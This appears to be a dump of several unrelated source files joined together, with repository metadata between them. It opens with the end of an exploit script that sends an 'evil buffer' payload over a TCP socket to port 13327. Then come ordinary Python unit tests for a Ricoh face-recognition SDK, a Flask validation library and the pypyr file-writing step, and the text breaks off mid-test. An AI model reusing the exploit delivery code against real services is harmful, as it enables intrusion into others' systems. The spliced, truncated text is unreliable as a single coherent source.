s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("[*]Sending evil buffer...")
s.connect((host, 13327))
data = s.recv(1024)
print(data)
s.send(buffer)
s.close()
print("[*]Payload Sent !")
7f4ad20cf0297bb388a96b6ac5eb26391bad9dba | 12,648 | py | Python | tests/test_vrs/test_face_collection.py | ricohapi/ricoh-cloud-sdk-python | 740d778c678e6097e3c35478545cbf283276a7ee | [
"MIT"
] | 2 | 2018-08-14T21:01:07.000Z | 2019-12-16T07:21:09.000Z | tests/test_vrs/test_face_collection.py | ricohapi/ricoh-cloud-sdk-python | 740d778c678e6097e3c35478545cbf283276a7ee | [
"MIT"
] | null | null | null | tests/test_vrs/test_face_collection.py | ricohapi/ricoh-cloud-sdk-python | 740d778c678e6097e3c35478545cbf283276a7ee | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (c) 2017 Ricoh Co., Ltd. All Rights Reserved.
import os
from unittest import TestCase
import json
import pytest
import mock
from mock import Mock, MagicMock
from requests.exceptions import RequestException
from ricohcloudsdk.vrs import util
from ricohcloudsdk.vrs.client import VisualRecognition
from ricohcloudsdk.exceptions import ClientError
ENDPOINT = 'https://ips.api.ricoh/v1'
def make_headers(c_type):
headers = {
'Authorization': 'Bearer atoken',
'x-api-key': 'apikey',
'Content-Type': c_type
}
return headers
class TestInit(TestCase):
def setUp(self):
self.aclient = Mock()
self.aclient.session = Mock(return_value={'access_token': 'atoken'})
def test_ok(self):
VisualRecognition(self.aclient)
def test_param_err(self):
with pytest.raises(TypeError):
VisualRecognition()
class TestMethodOK(TestCase):
def setUp(self):
self.aclient = Mock()
self.aclient.get_access_token = Mock(return_value='atoken')
self.aclient.get_api_key = Mock(return_value='apikey')
self.aclient.session = Mock(return_value={'access_token': 'atoken'})
self.vrs = VisualRecognition(self.aclient)
self.__create_face_collection_expected = {
'collection_id': '728bee35-fa67-473b-91bf-79f088f46179'
}
self.__list_face_collections_expected = {
'face_collections': [
{
'collection_id': '728bee35-fa67-473b-91bf-79f088f46179'
}
]
}
self.__list_faces_expected = {
'faces': [
{
'face_id': '728bee35-fa67-473b-91bf-79f088f46179'
}
]
}
self.__add_face_expected = {
'face_id': '728bee35-fa67-473b-91bf-79f088f46179',
'location': {
'left': 1085,
'top': 244,
'right': 1307,
'bottom': 466
}
}
self.__compare_face_to_collection_expected = {
'source': {
'location': {
'left': 1085,
'top': 244,
'right': 1307,
'bottom': 466
}
},
'target': {
'collection_id': '80bf2bdc-d3de-491e-9106-0635df0a0a18',
'faces': [
{
'face_id': '80bf2bdc-d3de-491e-9106-0635df0a0a18',
'score': 0.787753701210022,
}
]
}
}
def test_param_err(self):
with pytest.raises(TypeError):
self.vrs.detect_faces()
@mock.patch('ricohcloudsdk.vrs.util.SESSION.request')
def test_list_collection(self, req):
req.return_value.text = json.dumps(
self.__list_face_collections_expected)
req.return_value.status_code = 200
assert self.__list_face_collections_expected == self.vrs.list_collections()
headers = make_headers('application/json')
req.assert_called_once_with(
'GET', ENDPOINT + '/face_collections', headers=headers)
@mock.patch('ricohcloudsdk.vrs.util.SESSION.request')
def test_create_collection(self, req):
req.return_value.text = json.dumps(
self.__create_face_collection_expected)
req.return_value.status_code = 201
assert self.__create_face_collection_expected == self.vrs.create_collection()
headers = make_headers('application/json')
req.assert_called_once_with(
'POST', ENDPOINT + '/face_collections', headers=headers)
@mock.patch('ricohcloudsdk.vrs.util.SESSION.request')
def test_delete_collection(self, req):
req.return_value.text = ''
req.return_value.status_code = 204
assert '' == self.vrs.delete_collection(
'728bee35-fa67-473b-91bf-79f088f46179')
headers = make_headers('application/json')
uri = '/face_collections/728bee35-fa67-473b-91bf-79f088f46179'
req.assert_called_once_with(
'DELETE', ENDPOINT + uri, headers=headers)
@mock.patch('ricohcloudsdk.vrs.util.SESSION.request')
def test_list_faces(self, req):
req.return_value.text = json.dumps(self.__list_faces_expected)
req.return_value.status_code = 200
assert self.__list_faces_expected == self.vrs.list_faces(
'728bee35-fa67-473b-91bf-79f088f46179')
headers = make_headers('application/json')
uri = '/face_collections/728bee35-fa67-473b-91bf-79f088f46179/faces'
req.assert_called_once_with(
'GET', ENDPOINT + uri, headers=headers)
@mock.patch('ricohcloudsdk.vrs.util.SESSION.request')
def test_remove_face(self, req):
req.return_value.text = ''
req.return_value.status_code = 204
assert '' == self.vrs.remove_face(
'728bee35-fa67-473b-91bf-79f088f46179', '79a68ab3-8c42-4c79-bc09-3ac363cd9ab1')
headers = make_headers('application/json')
uri = '/face_collections/728bee35-fa67-473b-91bf-79f088f46179/faces/79a68ab3-8c42-4c79-bc09-3ac363cd9ab1'
req.assert_called_once_with(
'DELETE', ENDPOINT + uri, headers=headers)
@mock.patch('ricohcloudsdk.vrs.util.Image.open')
@mock.patch('os.path.isfile')
@mock.patch('ricohcloudsdk.vrs.client.open')
@mock.patch('ricohcloudsdk.vrs.util.SESSION.request')
def test_add_face_jpeg(self, req, opn, isfile, pil_open):
req.return_value.text = json.dumps(self.__add_face_expected)
req.return_value.status_code = 201
opn.side_effect = mock.mock_open()
opn.read_data = b'readdata'
isfile.return_value = True
img = MagicMock()
img.format.lower.side_effect = ['jpeg']
pil_open.return_value = img
assert self.__add_face_expected == self.vrs.add_face(
'test.jpg', '728bee35-fa67-473b-91bf-79f088f46179')
headers = {
'Authorization': 'Bearer atoken',
'x-api-key': 'apikey'
}
uri = '/face_collections/728bee35-fa67-473b-91bf-79f088f46179/faces'
payload = {
'image': opn()
}
req.assert_called_once_with(
'POST', ENDPOINT + uri, headers=headers, files=payload)
@mock.patch('ricohcloudsdk.vrs.util.Image.open')
@mock.patch('os.path.isfile')
@mock.patch('ricohcloudsdk.vrs.client.open')
@mock.patch('ricohcloudsdk.vrs.util.SESSION.request')
def test_add_face_png(self, req, opn, isfile, pil_open):
req.return_value.text = json.dumps(self.__add_face_expected)
req.return_value.status_code = 201
opn.side_effect = mock.mock_open()
opn.read_data = b'readdata'
isfile.return_value = True
img = MagicMock()
img.format.lower.side_effect = ['png']
pil_open.return_value = img
assert self.__add_face_expected == self.vrs.add_face(
'test.png', '728bee35-fa67-473b-91bf-79f088f46179')
headers = {
'Authorization': 'Bearer atoken',
'x-api-key': 'apikey'
}
uri = '/face_collections/728bee35-fa67-473b-91bf-79f088f46179/faces'
payload = {
'image': opn()
}
req.assert_called_once_with(
'POST', ENDPOINT + uri, headers=headers, files=payload)
@mock.patch('ricohcloudsdk.vrs.util.SESSION.request')
def test_add_face_uri(self, req):
req.return_value.text = json.dumps(self.__add_face_expected)
req.return_value.status_code = 200
assert self.__add_face_expected == self.vrs.add_face(
'http://test.com/test.jpg', '728bee35-fa67-473b-91bf-79f088f46179')
headers = make_headers('application/json')
payload = json.dumps({'image': 'http://test.com/test.jpg'})
uri = '/face_collections/728bee35-fa67-473b-91bf-79f088f46179/faces'
req.assert_called_once_with(
'POST', ENDPOINT + uri, headers=headers, data=payload)
@mock.patch('ricohcloudsdk.vrs.util.SESSION.request')
def test_compare_faces_uri_to_collection(self, req):
req.return_value.text = json.dumps(
self.__compare_face_to_collection_expected)
req.return_value.status_code = 200
assert self.__compare_face_to_collection_expected == self.vrs.compare_faces(
'http://test.com/test_1.jpg', '728bee35-fa67-473b-91bf-79f088f46179')
headers = make_headers('application/json')
payload = json.dumps(
{
'image': 'http://test.com/test_1.jpg'
}
)
uri = '/compare_faces/728bee35-fa67-473b-91bf-79f088f46179'
req.assert_called_once_with(
'POST', ENDPOINT + uri, headers=headers, data=payload)
@mock.patch('ricohcloudsdk.vrs.util.Image.open')
@mock.patch('os.path.isfile')
@mock.patch('ricohcloudsdk.vrs.client.open')
@mock.patch('ricohcloudsdk.vrs.util.SESSION.request')
def test_compare_faces_image_to_collection(self, req, opn, isfile, pil_open):
req.return_value.text = json.dumps(
self.__compare_face_to_collection_expected)
req.return_value.status_code = 200
isfile.side_effect = [True, False]
img = MagicMock()
img.format.lower.side_effect = ['jpeg']
pil_open.return_value = img
opn.side_effect = mock.mock_open()
opn.read_data = b'readdata'
assert self.__compare_face_to_collection_expected == self.vrs.compare_faces(
'test_1.jpg', '728bee35-fa67-473b-91bf-79f088f46179')
headers = {
'Authorization': 'Bearer atoken',
'x-api-key': 'apikey'
}
payload = {
'image': opn()
}
uri = '/compare_faces/728bee35-fa67-473b-91bf-79f088f46179'
req.assert_called_once_with(
'POST', ENDPOINT + uri, headers=headers, files=payload)
class TestMethodError(TestCase):
def setUp(self):
self.aclient = Mock()
self.aclient.get_access_token = Mock(return_value='atoken')
self.aclient.get_api_key = Mock(return_value='apikey')
self.aclient.session = Mock(return_value={'access_token': 'atoken'})
self.vrs = VisualRecognition(self.aclient)
def test_add_face_file_not_found(self):
with pytest.raises(ValueError) as excinfo:
self.vrs.add_face('collection_id', 'image.jpg')
assert util.RESOURCE_ERROR == str(excinfo.value)
@mock.patch('ricohcloudsdk.vrs.util.Image.open')
@mock.patch('os.path.isfile')
@mock.patch('ricohcloudsdk.vrs.client.open')
def test_compare_faces_uuid_jpeg(self, opn, isfile, pil_open):
opn.side_effect = mock.mock_open()
opn.read_data = b'readdata'
isfile.side_effect = [False, True]
img = MagicMock()
img.format.lower.return_value = 'jpeg'
pil_open.return_value = img
with pytest.raises(ValueError) as excinfo:
self.vrs.compare_faces(
'ef0dce93-c2ac-4da5-bb2c-82ca7c770ad8', 'test_1.jpeg'
)
assert util.COMBINATION_ERROR == str(excinfo.value)
@mock.patch('ricohcloudsdk.vrs.util.Image.open')
@mock.patch('os.path.isfile')
@mock.patch('ricohcloudsdk.vrs.client.open')
def test_compare_faces_uuid_uri(self, opn, isfile, pil_open):
opn.side_effect = mock.mock_open()
opn.read_data = b'readdata'
isfile.side_effect = [False, False]
with pytest.raises(ValueError) as excinfo:
self.vrs.compare_faces(
                'ef0dce93-c2ac-4da5-bb2c-82ca7c770ad8', 'https://test.com/test.jpg'
)
assert util.COMBINATION_ERROR == str(excinfo.value)
@mock.patch('ricohcloudsdk.vrs.util.Image.open')
@mock.patch('os.path.isfile')
@mock.patch('ricohcloudsdk.vrs.client.open')
def test_compare_faces_uuid_uuid(self, opn, isfile, pil_open):
opn.side_effect = mock.mock_open()
opn.read_data = b'readdata'
isfile.side_effect = [False, False]
with pytest.raises(ValueError) as excinfo:
self.vrs.compare_faces(
'ef0dce93-c2ac-4da5-bb2c-82ca7c770ad8', '06ef969b-4d2f-49bf-8f79-afc3bc072def'
)
assert util.COMBINATION_ERROR == str(excinfo.value)
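The tests above stack several `mock.patch` decorators, and the mock arguments arrive bottom-up: the decorator closest to the function supplies the first parameter, which is why `req` (patching `SESSION.request`, the innermost decorator) comes first while `pil_open` comes last. A minimal stdlib-only sketch of that ordering, using `os.path` targets as stand-ins for the SDK modules patched above:

```python
import os.path
from unittest import mock

# Decorators apply bottom-up: the patch nearest the function
# becomes the first mock parameter.
@mock.patch('os.path.isfile')   # outermost -> last parameter
@mock.patch('os.path.exists')   # innermost -> first parameter
def probe(mock_exists, mock_isfile):
    os.path.exists('a')
    os.path.isfile('b')
    return mock_exists, mock_isfile

mock_exists, mock_isfile = probe()
mock_exists.assert_called_once_with('a')   # innermost patch captured exists()
mock_isfile.assert_called_once_with('b')   # outermost patch captured isfile()
```

Getting this pairing wrong silently swaps the mocks, so assertions like `req.assert_called_once_with(...)` would then run against the wrong patch target.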
# File: test_app/test.py | Repo: OmarThinks/MoRG | License: MIT
import os
import secrets
import unittest
import json
import random
from flask import Flask, request, abort, jsonify
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy import func
from flask_cors import CORS
from flask_migrate import Migrate
import base64
from app import create_app
"""
b:validation Functions
"""
unittest.TestLoader.sortTestMethodsUsing = None
class receiver_TestCase(unittest.TestCase):
"""This class represents the trivia test case"""
def setUp(self):
# create and configure the app
self.app = create_app() #Flask(__name__)
self.client = self.app.test_client
#db.app = self.app
#db.init_app(self.app)
#db.create_all()
def tearDown(self):
"""Executed after reach test"""
print("_+++++++++++++++++++++++++++++++++_")
    # Note: Tests are run alphabetically
def test_00000_test(self):
self.assertEqual(1,1)
print("Test 0:Hello, Tests!")
def test_a_0_0_0(self):
print("Testing json_receiver")
def test_a_1_1_1_json_receiver_tests(self):
#Testing the function of route "json_receiver_test/int"
response = self.client().post("/json_receiver/1")
#Expected to fail, No request body
data = json.loads(response.data)
#print(data)
self.assertEqual(data,{'message': "MoRBs:json_"+
"json_receiver:ERROR: 'request' is supposed to "+
"have the type of 'LocalProxy', but found "+
"type of '<class 'int'>' instead"})
self.assertEqual(response.status_code,200)
print("Test a_1_1_1: json_receiver_tests : request not flask_request")
def test_a_1_2_1_json_receiver_tests(self):
#Testing the function of route "json_receiver_test/int"
response = self.client().post("/json_receiver/2")
#Expected to fail, No request body
data = json.loads(response.data)
#print(data)
self.assertEqual(data,{'message': "MoRBs:"+
"json_receiver:ERROR: 'saModel' is supposed"+
" to have the type of 'DeclarativeMeta', but"+
" found type of '<class 'int'>' instead"})
self.assertEqual(response.status_code,200)
print("Test a_1_2_1: json_receiver_tests : Not saModel")
def test_a_1_3_1_json_receiver_tests(self):
#Testing the function of route "json_receiver_test/int"
response = self.client().post("/json_receiver/3")
#Expected to fail, No request body
data = json.loads(response.data)
#print(data)
self.assertEqual(data,{'message': "MoRBs:"+
"json_receiver:ERROR: 'element in neglect"+
" list' is supposed to have the type of 'str'"+
", but found type of '<class 'int'>' instead"})
self.assertEqual(response.status_code,200)
print("Test a_1_3_1: json_receiver_tests : neglect fails")
def test_a_1_4_1_json_receiver_tests(self):
#Testing the function of route "receiver_test/int"
response = self.client().post("/json_receiver/4")
#Expected to fail, No request body
data = json.loads(response.data)
#print(data)
self.assertEqual(data,{'message': "MoRBs:"+
"json_receiver:ERROR: 'element in extra "+
"list' is supposed to have the type of 'str'"+
", but found type of '<class 'int'>' instead"})
self.assertEqual(response.status_code,200)
print("Test a_1_4_1: json_receiver_tests : extra fails")
def test_a_1_5_1_json_receiver_tests(self):
#Testing the function of route "json_receiver_test/int"
response = self.client().post("/json_receiver/5")
#Expected to fail, No request body
data = json.loads(response.data)
#print(data)
self.assertEqual(data,{'result': {
'description': 'there is no request body',
'status': 400}, 'success': False})
self.assertEqual(response.status_code,200)
print("Test a_1_5_1: json_receiver_tests : neglect fails,"+
" a field not in saModel")
def test_a_1_5_2_json_receiver_tests(self):
#Testing the function of route "json_receiver_test/int"
response = self.client().post("/json_receiver/5",json={})
#Expected to fail, No request body
data = json.loads(response.data)
print(data)
self.assertEqual(data,{'result': {
'description': 'there is no request body',
'status': 400}, 'success': False})
self.assertEqual(response.status_code,200)
print("Test a_1_5_2: json_receiver_tests : neglect fails,"+
" a field not in saModel")
"""def test_c_1_1_1_receiver_tests(self):
#Testing the function of route "receiver_test/int"
response = self.client().post("/receiver/1")
#Expected to fail, No request body
data = json.loads(response.data)
self.assertEqual(data,{'description':
'there is no request body', 'error': 400, 'message': 'bad request',
'success': False})
self.assertEqual(response.status_code,400)
print("Test c_1_1_1: receiver_tests : no request body")
def test_c_1_1_2_receiver_tests(self):
#Testing the function of route "receiver_test/int"
response = self.client().post("/receiver_test/1",json={})
#Expected to Succeed, Error in the server
data = json.loads(response.data)
self.assertEqual(data,{"success":True,"result":
{'in_stock': None, 'name': None, 'price': None}})
self.assertEqual(response.status_code,200)
print("Test c_1_1_2: receiver_tests : request body successful, empty")
def test_c_1_1_3_receiver_tests(self):
#Testing the function of route "receiver_test/int"
response = self.client().post("/receiver_test/1",json=
{'in_stock': True, 'name': "abc", 'price': 5})
#Expected to succeed,
data = json.loads(response.data)
self.assertEqual(response.status_code,200)
self.assertEqual(data,{"success":True,"result":
{'in_stock': True, 'name': "abc", 'price': 5}})
print("Test c_1_1_3: receiver_tests : request body"+
" successful, full request body")
def test_c_1_2_1_receiver_tests(self):
#Testing the function of route "receiver_test/int"
response = self.client().post("/receiver_test/2",json=
{'in_stock': True, 'name': "abc", 'price': 5})
#Expected to succeed, empty response
data = json.loads(response.data)
self.assertEqual(response.status_code,200)
self.assertEqual(data,{"success":True,"result":{}})
print("Test c_1_2_1: receiver_tests : request body"+
" successful, full request body")
def test_c_1_2_2_receiver_tests(self):
#Testing the function of route "receiver_test/int"
response = self.client().post("/receiver_test/2")
#Expected to succeed, empty response
data = json.loads(response.data)
self.assertEqual(response.status_code,200)
self.assertEqual(data,{"success":True,"result":{}})
print("Test c_1_2_2: receiver_tests : request body"+
" successful, empty request body")
def test_c_1_3_1_receiver_tests(self):
#Testing the function of route "receiver_test/int"
response = self.client().post("/receiver_test/3")
#Expected to fail, request has wrong value
data = json.loads(response.data)
self.assertEqual(response.status_code,500)
self.assertEqual(data,{'description': "MoRBs:receiver:ERROR: "+
"'request' is supposed to have the type of "+
"'flask.request', but found type of '<class 'int'>' instead",
'error': 500, 'message': 'internal server error', 'success': False})
print("Test c_1_3_1: wrong request type")
def test_c_1_3_2_receiver_tests(self):
#Testing the function of route "receiver_test/int"
response = self.client().post("/receiver_test/3",json={"price":5})
#Expected to fail, request has wrong value
data = json.loads(response.data)
self.assertEqual(response.status_code,500)
self.assertEqual(data,{'description': "MoRBs:receiver:ERROR: "+
"'request' is supposed to have the type of 'flask.request'"+
", but found type of '<class 'int'>' instead",
'error': 500, 'message': 'internal server error', 'success': False})
print("Test c_1_3_2: wrong request type")
def test_c_1_4_1_receiver_tests(self):
#Testing the function of route "receiver_test/int"
response = self.client().post("/receiver_test/3")
#Expected to fail, request has wrong value
data = json.loads(response.data)
self.assertEqual(response.status_code,500)
self.assertEqual(data,{'description': "MoRBs:receiver:ERROR: 'request' "+
"is supposed to have the type of 'flask.request', but found type of "+
"'<class 'int'>' instead", 'error': 500, 'message':
'internal server error', 'success': False})
print("Test c_1_4_1: wrong request type")
def test_c_1_4_2_receiver_tests(self):
#Testing the function of route "receiver_test/int"
response = self.client().post("/receiver_test/3",json={"price":5})
#Expected to fail, request has wrong value
data = json.loads(response.data)
self.assertEqual(response.status_code,500)
self.assertEqual(data,{'description': "MoRBs:receiver:ERROR: "+
"'request' is supposed to have the type of 'flask.request'"+
", but found type of '<class 'int'>' instead", 'error': 500,
'message': 'internal server error', 'success': False})
print("Test c_1_4_2: wrong request type")
def test_c_1_5_1_receiver_tests(self):
#Testing the function of route "receiver_test/int"
response = self.client().post("/receiver_test/5")
#Expected to fail, request has wrong value
data = json.loads(response.data)
self.assertEqual(response.status_code,500)
self.assertEqual(data,{'description': "MoRBs:validate_expected:ERROR: "+
"'expected' is supposed to have the type of 'dict', but found "+
"type of '<class 'str'>' instead", 'error': 500,
'message': 'internal server error', 'success': False})
print("Test c_1_5_1: wrong inputs type")
def test_c_1_6_1_receiver_tests(self):
#Testing the function of route "receiver_test/int"
response = self.client().post("/receiver_test/6")
#Expected to fail, request has wrong value
data = json.loads(response.data)
self.assertEqual(response.status_code,500)
self.assertEqual(data,{'description': "MoRBs:validate_expected:ERROR: "+
"'expected' is supposed to have the type of 'dict', but found type "+
"of '<class 'list'>' instead", 'error': 500,
'message': 'internal server error', 'success': False})
print("Test c_1_6_1: wrong type in inputs")
def test_c_1_7_1_receiver_tests(self):
#Testing the function of route "receiver_test/int"
response = self.client().post("/receiver_test/7")
#Expected to fail, request has wrong value
data = json.loads(response.data)
self.assertEqual(response.status_code,500)
self.assertEqual(data,{'description': "MoRBs:validate_expected:ERROR: "+
"'expected' is supposed to have the type of 'dict', but found "+
"type of '<class 'list'>' instead", 'error': 500,
'message': 'internal server error', 'success': False})
print("Test c_1_7_1: wrong type in inputs")
def test_c_1_8_1_receiver_tests(self):
#Testing the function of route "receiver_test/int"
response = self.client().post("/receiver_test/8")
#Expected to fail, request has wrong value
data = json.loads(response.data)
self.assertEqual(response.status_code,200)
self.assertEqual(data,{"result":{}, 'success': True})
print("Test c_1_8_1: wrong type in inputs")
def test_c_2_1_attendance_validator(self):
# Perfect no old
self.assertEqual(attendance_validator(expected=
{"name":"string","price":"integer","in_stock":"boolean"}
,received={"success":True,
"result":{"name":"abc","price":5,"in_stock":True}}),
{"success":True,"result":{"name":"abc","price":5,"in_stock":True}})
# Perfect empty no old
self.assertEqual(attendance_validator(expected={}
,received={"success":True,
"result":{"name":"abc","price":5,"in_stock":True}}),
{"success":True,"result":{}})
print("Test c_2_1: attendance_validator")
def test_c_2_2_attendance_validator(self):
# perfect with old
self.assertEqual(attendance_validator(expected=
{"name":"string","price":"integer","in_stock":"boolean"}
,received={"success":True,
"result":{"name":"abc","price":5,"in_stock":True}},
old={"name":"efg","price":9,"in_stock":False}),
{"success":True,"result":{"name":"abc","price":5,"in_stock":True}})
# missing values with old
self.assertEqual(attendance_validator(expected=
{"name":"string","price":"integer","in_stock":"boolean"}
,received={"success":True,
"result":{"name":None,"price":None,"in_stock":True,"data":False}},
old={"name":"efg","price":9,"in_stock":False,"rty":"741"}),
{"success":True,"result":{"name":"efg","price":9,"in_stock":True}})
# empty with old
self.assertEqual(attendance_validator(expected=
{}
,received={"success":True,
"result":{"name":None,"price":None,"in_stock":True}},
old={"name":"efg","price":9,"in_stock":False}),
{"success":True,"result":{}})
print("Test c_2_2: attendance_validator")
def test_c_2_3_attendance_validator(self):
# new missing value
self.assertEqual(attendance_validator(expected=
{"name":"string","price":"integer","in_stock":"boolean"}
,received={"success":True,
"result":{"name":None,"price":5,"in_stock":True}}),
{"success":False,"result":{"status":400,"description":
"name is missing"}})
# old missing all
self.assertEqual(attendance_validator(expected=
{"name":"string","price":"integer","in_stock":"boolean"}
,received={"success":True,
"result":{"name":None,"price":None,"in_stock":None}},
old={"name":"efg","price":9,"in_stock":False}),
{"success":False,"result":{"status":400,"description":
"you must at least enter one field to change"}})
print("Test c_2_3: attendance_validator")
def test_c_2_4_attendance_validator(self):
# failing checkpoint
try:
attendance_validator(expected=
{"name":"string","price":"integer","in_stock":"boolean"}
,received={"success":1,
"result":{"name":"abc","price":5,"in_stock":True}},
old={"name":"efg","price":9,"in_stock":False})
except Exception as e:
self.assertEqual(str(e),"MoRBs:attendance_validator:ERROR: 'received['success']' is supposed to have the type of 'bool', but found type of '<class 'int'>' instead")
# recieved not dict
try:
attendance_validator(expected=
{"name":"string","price":"integer","in_stock":"boolean"}
,received="abc",
old={"name":"efg","price":9,"in_stock":False})
except Exception as e:
self.assertEqual(str(e),"MoRBs:attendance_validator:ERROR: 'received' is supposed to have the type of 'dict', but found type of '<class 'str'>' instead")
print("Test c_2_4: attendance_validator")"""
# Make the tests conveniently executable
if __name__ == "__main__":
    unittest.main()
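The note near the top of this test class ("Tests are run alphabetically") relies on `unittest`'s loader behaviour: test method names are collected in alphabetical order, which is why the tests here encode their intended sequence into names like `test_a_1_1_1_...` and `test_c_2_4_...`. A small sketch of that collection order (the `Ordered` class is a hypothetical example, not part of the app):

```python
import unittest

class Ordered(unittest.TestCase):
    # Defined deliberately out of order: b, a_2, a_1.
    def test_b(self):
        pass
    def test_a_2(self):
        pass
    def test_a_1(self):
        pass

# Names come back alphabetically, not in definition order.
names = unittest.TestLoader().getTestCaseNames(Ordered)
print(names)  # -> ['test_a_1', 'test_a_2', 'test_b']
```

This is why renaming a test can silently change the order in which side effects (database setup, created records) happen across tests.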
# File: cases/fractals/__init__.py | Repo: vikian050194/svg | License: MIT
from .serp import *
# File: tests/unit/pypyr/steps/filewriteyaml_test.py | Repo: mofm/pypyr | License: Apache-2.0
"""filewriteyaml.py unit tests."""
import io
from unittest.mock import mock_open, patch
import pytest
from pypyr.context import Context
from pypyr.dsl import Jsonify
from pypyr.errors import (
ContextError,
KeyInContextHasNoValueError,
KeyNotInContextError)
import pypyr.steps.filewriteyaml as filewrite
def test_filewriteyaml_no_filewriteyaml_raises():
"""No input fileWriteYaml raises."""
context = Context({
'k1': 'v1'})
with pytest.raises(KeyNotInContextError) as err_info:
filewrite.run_step(context)
assert str(err_info.value) == (
"context['fileWriteYaml'] doesn't exist. "
"It must exist for pypyr.steps.filewriteyaml.")
def test_filewriteyaml_none_filewriteyaml_raises():
"""None fileWriteYaml raises."""
context = Context({
'k1': 'v1',
'fileWriteYaml': None})
with pytest.raises(KeyInContextHasNoValueError) as err_info:
filewrite.run_step(context)
assert str(err_info.value) == (
"context['fileWriteYaml'] must have a value for "
"pypyr.steps.filewriteyaml.")
def test_filewriteyaml_filewriteyaml_not_iterable_raises():
"""Not iterable fileWriteYaml raises."""
context = Context({
'k1': 'v1',
'fileWriteYaml': 1})
with pytest.raises(ContextError) as err_info:
filewrite.run_step(context)
assert str(err_info.value) == (
"context['fileWriteYaml'] must exist, be iterable "
"and contain 'path' for pypyr.steps.filewriteyaml. argument of type "
"'int' is not iterable")
def test_filewriteyaml_empty_path_raises():
"""Empty path raises."""
context = Context({
'fileWriteYaml': {
'path': None
}})
with pytest.raises(KeyInContextHasNoValueError) as err_info:
filewrite.run_step(context)
assert str(err_info.value) == (
"context['fileWriteYaml']['path'] must have a value for "
"pypyr.steps.filewriteyaml.")
def test_filewriteyaml_no_path_raises():
"""No path raises."""
context = Context({
'fileWriteYaml': 'blah',
'k1': 'v1'})
with pytest.raises(KeyNotInContextError) as err_info:
filewrite.run_step(context)
assert str(err_info.value) == ("context['fileWriteYaml']['path'] "
"doesn't exist. It must exist for "
"pypyr.steps.filewriteyaml.")
@patch('pypyr.steps.filewriteyaml.Path')
def test_filewriteyaml_pass_no_payload(mock_path):
"""Success case writes all context out when no payload."""
context = Context({
'k1': 'v1',
'fileWriteYaml': {
'path': '/arb/blah'
}})
with io.StringIO() as out_text:
with patch('pypyr.steps.filewriteyaml.open',
mock_open()) as mock_output:
mock_output.return_value.write.side_effect = out_text.write
filewrite.run_step(context)
assert context, "context shouldn't be None"
assert len(context) == 2, "context should have 2 items"
assert context['k1'] == 'v1'
assert context['fileWriteYaml'] == {'path': '/arb/blah'}
mock_path.assert_called_once_with('/arb/blah')
mocked_path = mock_path.return_value
mocked_path.parent.mkdir.assert_called_once_with(parents=True,
exist_ok=True)
mock_output.assert_called_once_with(mocked_path, 'w')
# yaml well formed & new lines and indents are where they should be
assert out_text.getvalue() == ('k1: v1\n'
'fileWriteYaml:\n'
' path: /arb/blah\n')
@patch('pypyr.steps.filewriteyaml.Path')
def test_filewriteyaml_pass_with_payload(mock_path):
"""Success case writes only specific context payload."""
context = Context({
'k1': 'v1',
'fileWriteYaml': {
'path': '/arb/blah',
'payload': [
'first',
'second',
{'a': 'b', 'c': 123.45, 'd': [0, 1, 2]},
12,
True
]
}})
with io.StringIO() as out_text:
with patch('pypyr.steps.filewriteyaml.open',
mock_open()) as mock_output:
mock_output.return_value.write.side_effect = out_text.write
filewrite.run_step(context)
assert context, "context shouldn't be None"
assert len(context) == 2, "context should have 2 items"
assert context['k1'] == 'v1'
assert context['fileWriteYaml']['payload'] == [
'first',
'second',
{'a': 'b', 'c': 123.45,
'd': [0, 1, 2]},
12,
True
]
assert context['fileWriteYaml'] == {'path': '/arb/blah',
'payload': [
'first',
'second',
{'a': 'b',
'c': 123.45,
'd': [0, 1, 2]},
12,
True
]}
mock_path.assert_called_once_with('/arb/blah')
mocked_path = mock_path.return_value
mocked_path.parent.mkdir.assert_called_once_with(parents=True,
exist_ok=True)
mock_output.assert_called_once_with(mocked_path, 'w')
# yaml well formed & new lines + indents are where they should be
assert out_text.getvalue() == (' - first\n'
' - second\n'
' - a: b\n'
' c: 123.45\n'
' d:\n'
' - 0\n'
' - 1\n'
' - 2\n'
' - 12\n'
' - true\n')
@patch('pypyr.steps.filewriteyaml.Path')
def test_filewriteyaml_pass_no_payload_substitutions(mock_path):
"""Success case writes all context out with substitutions."""
context = Context({
'k1': 'v1',
'pathkey': '/arb/path',
'parent': [0, 1, {'child': '{k1}'}],
'nested': '{parent[2][child]}',
'jsonify': Jsonify({'arb': 123}),
'fileWriteYaml': {
'path': '{pathkey}'
}})
with io.StringIO() as out_text:
with patch('pypyr.steps.filewriteyaml.open',
mock_open()) as mock_output:
mock_output.return_value.write.side_effect = out_text.write
filewrite.run_step(context)
assert context, "context shouldn't be None"
assert len(context) == 6, "context should have 6 items"
assert context['k1'] == 'v1'
assert context['fileWriteYaml'] == {'path': '{pathkey}'}
mock_path.assert_called_once_with('/arb/path')
mocked_path = mock_path.return_value
mocked_path.parent.mkdir.assert_called_once_with(parents=True,
exist_ok=True)
mock_output.assert_called_once_with(mocked_path, 'w')
# yaml well formed & new lines + indents are where they should be
assert out_text.getvalue() == ('k1: v1\n'
'pathkey: /arb/path\n'
'parent:\n'
' - 0\n'
' - 1\n'
' - child: v1\n'
'nested: v1\n'
'jsonify: \'{"arb": 123}\'\n'
'fileWriteYaml:\n'
' path: /arb/path\n')
@patch('pypyr.steps.filewriteyaml.Path')
def test_filewriteyaml_pass_with_payload_substitutions(mock_path):
"""Success case writes only specified context with substitutions."""
context = Context({
'k1': 'v1',
'intkey': 3,
'pathkey': '/arb/path',
'parent': [0,
1,
{'child': ['{k1}',
'{intkey}',
['a', 'b', 'c']
]}],
'nested': '{parent[2][child]}',
'fileWriteYaml': {
'path': '{pathkey}',
'payload': '{parent[2]}'
}})
with io.StringIO() as out_text:
with patch('pypyr.steps.filewriteyaml.open',
mock_open()) as mock_output:
mock_output.return_value.write.side_effect = out_text.write
filewrite.run_step(context)
assert context, "context shouldn't be None"
assert len(context) == 6, "context should have 6 items"
assert context['k1'] == 'v1'
assert context['fileWriteYaml'] == {'path': '{pathkey}',
'payload': '{parent[2]}'}
assert context['parent'] == [0,
1,
{'child': ['{k1}',
'{intkey}',
['a', 'b', 'c']
]
}
]
mock_path.assert_called_once_with('/arb/path')
mocked_path = mock_path.return_value
mocked_path.parent.mkdir.assert_called_once_with(parents=True,
exist_ok=True)
mock_output.assert_called_once_with(mocked_path, 'w')
# yaml well formed & new lines + indents are where they should be
assert out_text.getvalue() == ('child:\n'
' - v1\n'
